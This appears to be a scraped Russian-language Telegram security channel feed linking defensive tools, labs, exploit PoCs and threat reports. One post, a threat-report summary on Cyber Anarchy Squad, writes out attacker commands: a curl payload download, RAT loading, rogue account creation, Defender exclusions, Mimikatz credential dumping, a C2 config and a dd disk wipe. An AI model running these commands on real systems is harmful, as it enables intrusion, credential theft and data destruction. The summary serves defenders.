Сегодня обнаружил, что у Grafana есть фича поиска своих токенов в GitHub.
Когда
Ваша Grafana может сравнивать этот хэш с хэшем своих токенов и присылать алерты что токен утек.
GitHub молодцы, Grafana молодцы, все молодцы! Осталось только включить
#grafana #security
Когда
GitHub Secret Scanning находит Grafana secret, его хэш отправляется в Grafana Labs’ secret scanning service.Ваша Grafana может сравнивать этот хэш с хэшем своих токенов и присылать алерты что токен утек.
GitHub молодцы, Grafana молодцы, все молодцы! Осталось только включить
[secretscan]#grafana #security
Grafana Labs
Configure Grafana secret scanning and notifications | Grafana documentation
Detect and revoke leaked Grafana service account tokens
🔥5🤡2❤1
Sara: RouterOS Security Inspector
Python скрипт для проверки безопасности конфигурации RouterOS
#routeros #mikrotik #security #analyzer
Python скрипт для проверки безопасности конфигурации RouterOS
#routeros #mikrotik #security #analyzer
👍8🔥3
DevSec Hardening Framework
Фреймворк и набор плейбуков для усиления безопасности ОС и сервисов
#security
Фреймворк и набор плейбуков для усиления безопасности ОС и сервисов
#security
GitHub
DevSec Hardening Framework
Security + DevOps: Automatic Server Hardening. DevSec Hardening Framework has 51 repositories available. Follow their code on GitHub.
❤3👍2🔥2
facct-shadow-twelve-report-2024.pdf
65.8 MB
«Тени не скроются: Расследование атак группировки Shadow»
F.A.C.C.T. выкатили объемный отчет о группировке Shadow, а также жирный комплект инструментария, используемого в атаках.
#security #report
F.A.C.C.T. выкатили объемный отчет о группировке Shadow, а также жирный комплект инструментария, используемого в атаках.
#security #report
👍5❤1
Шаблоны для построения security пайплайнов. Можно взять какие-то идеи при построении DevSecOps пайплайна
Ещё один
#security
Ещё один
#security
GitLab
Files · main · Whitespots public / pipelines · GitLab
Security pipelines
❤1🔥1
Falcosidekick - коннектор Falco (eBPF аудит сисколов) ко всему на свете - позволит отправлять уведомленния о событиях в мессенджеры, БД, Jira, да куда угодно
И falcosidekick-ui - UI к нему
#falco #security
И falcosidekick-ui - UI к нему
#falco #security
GitHub
GitHub - falcosecurity/falcosidekick: Connect Falco to your ecosystem
Connect Falco to your ecosystem. Contribute to falcosecurity/falcosidekick development by creating an account on GitHub.
👍3
Сквозь тени анархии: разбираем атаки Cyber Anarchy Squad
Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.
2. Execution (Выполнение):
- Запуск команд через MS SQL:
-Процесс cmd.exe запускается как дочерний процесс
- Запуск PowerShell-скриптов:
-Загрузка обратной оболочки Meterpreter через c URL:
-Запуск Revenge RAT через PowerShell:
3. Persistence (Закрепление):
-Создание учетных записей:
-Автозапуск через реестр:
-Создание службы для RAT:
4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
-Добавление исключений Windows Defender:
- Имитация системных процессов:
5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей):
6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
WMI-запросы:
7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}
8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
Выжимку по командам стащил из Linkedin
#security #report
Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.
2. Execution (Выполнение):
- Запуск команд через MS SQL:
cmd.exe /c-Процесс cmd.exe запускается как дочерний процесс
sqlservr.exe- Запуск PowerShell-скриптов:
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1
-Загрузка обратной оболочки Meterpreter через c URL:
cmd.exe" /c cd %appdata% && dir && curl -O [URL]/sdc.exe
-Запуск Revenge RAT через PowerShell:
powershell.exe -WindowStyle Hidden -NoExit -Command
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\<exe_name>.exe').EntryPoint.Invoke($null, @())
3. Persistence (Закрепление):
-Создание учетных записей:
net user admin cas /add
net user admin admin123123123 /add
-Автозапуск через реестр:
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("rpchost", "\"C:\\Windows\\System32\\rpchost.exe\"");-Создание службы для RAT:
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null);
4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
$guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value }
msiexec.exe /x $guid /quiet
-Добавление исключений Windows Defender:
powershell Add-MpPreference -ExclusionPath '$windir\$system32'
- Имитация системных процессов:
С:\Windows\System32\svxhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe
5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей):
sekurlsa::logonpasswords6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
net user
systeminfo
net localgroup
cd %appdata% && whoami
WMI-запросы:
SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor
7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}
8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
dd if=/dev/zero of=/dev/[VOLUME] bs=4M
Выжимку по командам стащил из Linkedin
#security #report
👍6🤔2👎1💩1🤣1
GitHub Actions Pipeline Enumeration and Attack Tool
GitHub recommends that self-hosted runners only be utilized for private repositories, however, there are thousands of organizations that utilize self-hosted runners. Default configurations are often vulnerable, and Gato uses a mix of workflow file analysis and run-log analysis to identify potentially vulnerable repositories at scale.
#security #github
GitHub recommends that self-hosted runners only be utilized for private repositories, however, there are thousands of organizations that utilize self-hosted runners. Default configurations are often vulnerable, and Gato uses a mix of workflow file analysis and run-log analysis to identify potentially vulnerable repositories at scale.
#security #github
GitHub
GitHub - praetorian-inc/gato: GitHub Actions Pipeline Enumeration and Attack Tool
GitHub Actions Pipeline Enumeration and Attack Tool - praetorian-inc/gato
🔥2
Интересное расследование от команды безопасности Google:
- малварь использует Google Calendar как Command&Control Center. Оператор (человек) создает в календаре событие с зашифрованным описанием. Малварь читает, расшифровывает и выполняет команды из шифра
- чтобы запутать дизассемблер адрес функции был запрятан с использованием переполнения буфера. То есть программа ссылается на "несуществующую" область памяти и выполняет код оттуда.В реверсе я не силен, поэтому тут мог грубо напутать, если есть гуру - пишите в комментах что там было
#security #APT
- малварь использует Google Calendar как Command&Control Center. Оператор (человек) создает в календаре событие с зашифрованным описанием. Малварь читает, расшифровывает и выполняет команды из шифра
- чтобы запутать дизассемблер адрес функции был запрятан с использованием переполнения буфера. То есть программа ссылается на "несуществующую" область памяти и выполняет код оттуда.
#security #APT
Google Cloud Blog
Mark Your Calendar: APT41 Innovative Tactics | Google Cloud Blog
🔥5
Mikrotik Ninja
Вас тоже бесят чуваки с блутус колонками повсюду? Вы знаете что делать #bluetooth #security
Уязвимости в Bluetooth чипах, позволяющие завладеть устройством.
Уязвимо большинство популярных наушников:
Beyerdynamic Amiron 300
Bose QuietComfort Earbuds
EarisMax Bluetooth Auracast Sender
Jabra Elite 8 Active
JBL Endurance Race 2
JBL Live Buds 3
Jlab Epic Air Sport ANC
Marshall ACTON III
Marshall MAJOR V
Marshall MINOR IV
Marshall MOTIF II
Marshall STANMORE III
Marshall WOBURN III
MoerLabs EchoBeatz
Sony CH-720N
Sony Link Buds S
Sony ULT Wear
Sony WF-1000XM3
Sony WF-1000XM4
Sony WF-1000XM5
Sony WF-C500
Sony WF-C510-GFP
Sony WH-1000XM4
Sony WH-1000XM5
Sony WH-1000XM6
Sony WH-CH520
Sony WH-XB910N
Sony WI-C100
Teufel Tatws2
Эксплойта в паблике ещё нет. Но молодежь с говнорэпом из блутус колонок очень очень ждет его. А ещё тут скоро будет запись доклада об этом
#security #bluetooth
Уязвимо большинство популярных наушников:
Beyerdynamic Amiron 300
Bose QuietComfort Earbuds
EarisMax Bluetooth Auracast Sender
Jabra Elite 8 Active
JBL Endurance Race 2
JBL Live Buds 3
Jlab Epic Air Sport ANC
Marshall ACTON III
Marshall MAJOR V
Marshall MINOR IV
Marshall MOTIF II
Marshall STANMORE III
Marshall WOBURN III
MoerLabs EchoBeatz
Sony CH-720N
Sony Link Buds S
Sony ULT Wear
Sony WF-1000XM3
Sony WF-1000XM4
Sony WF-1000XM5
Sony WF-C500
Sony WF-C510-GFP
Sony WH-1000XM4
Sony WH-1000XM5
Sony WH-1000XM6
Sony WH-CH520
Sony WH-XB910N
Sony WI-C100
Teufel Tatws2
Эксплойта в паблике ещё нет. Но молодежь с говнорэпом из блутус колонок очень очень ждет его. А ещё тут скоро будет запись доклада об этом
#security #bluetooth
❤4🤔3🔥1
Cybershit
🐐 Kubernetes Goat — наверное самый популярный проект для изучения безопасности Kubernetes. Круто, что благодаря сообществу они продолжают развивать и добавлять новые сценарии. Например недавно добавили лабы для изучения Cilium Tetragon и Kyverno. Большинство…
Damn Vulnerable Kubernetes App
Аналог Kubernetes Goat для похека k8s из уязвимых приложений. Пока только три челленджа:
1. Hack The NFT Museum
2. Enterprise Grade Network Debugging Console
3. From App-Level CVEs to Full Cluster Takeover
и большой воркшоп Hands-On Attack and Defense где рассматриваются разные темы для специалистов разного уровня подготовки - от деплоя приложений до эксплуатации Ingress NightMare
#k8s #security
Аналог Kubernetes Goat для похека k8s из уязвимых приложений. Пока только три челленджа:
1. Hack The NFT Museum
2. Enterprise Grade Network Debugging Console
3. From App-Level CVEs to Full Cluster Takeover
и большой воркшоп Hands-On Attack and Defense где рассматриваются разные темы для специалистов разного уровня подготовки - от деплоя приложений до эксплуатации Ingress NightMare
#k8s #security
GitHub
GitHub - Alevsk/dvka: Damn Vulnerable Kubernetes App (DVKA) is a series of apps deployed on Kubernetes that are damn vulnerable.
Damn Vulnerable Kubernetes App (DVKA) is a series of apps deployed on Kubernetes that are damn vulnerable. - Alevsk/dvka
🔥3❤2
https://github.com/infinition/Bjorn
Bjorn is a « Tamagotchi like » sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT.
И статья на ксакепе о нем
#security
Bjorn is a « Tamagotchi like » sophisticated, autonomous network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT.
И статья на ксакепе о нем
#security
GitHub
GitHub - infinition/Bjorn: Bjorn is a powerful network scanning and offensive security tool for the Raspberry Pi with a 2.13-inch…
Bjorn is a powerful network scanning and offensive security tool for the Raspberry Pi with a 2.13-inch e-Paper HAT. It discovers network targets, identifies open ports, exposed services, and potent...
👍5
Огромная база паролей с поиском по хэшу и c API. Ещё и бесплатно
https://weakpass.com/
#security #password
https://weakpass.com/
#security #password
👍8❤1
Forwarded from Make. Build. Break. Reflect.
#devops #linux #security
Только-только отгремели два LPE
- https://copy.fail/
- https://github.com/V4bel/dirtyfrag
Не успели донести ещё до продакшна изменения-фиксы, так уже третья проблема прилетела.
- https://github.com/v12-security/pocs/tree/main/fragnesia
Какой ад, если честно🤦♂️ 🤦♂️ 🤦♂️
Чот всё как-то проклято с этими LPE.
Ведь точно не последняя будет с такой-то волной интереса и доступностью AI агентов и ассистентов.
Только-только отгремели два LPE
- https://copy.fail/
- https://github.com/V4bel/dirtyfrag
Не успели донести ещё до продакшна изменения-фиксы, так уже третья проблема прилетела.
- https://github.com/v12-security/pocs/tree/main/fragnesia
Какой ад, если честно
Чот всё как-то проклято с этими LPE.
Ведь точно не последняя будет с такой-то волной интереса и доступностью AI агентов и ассистентов.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3🐳1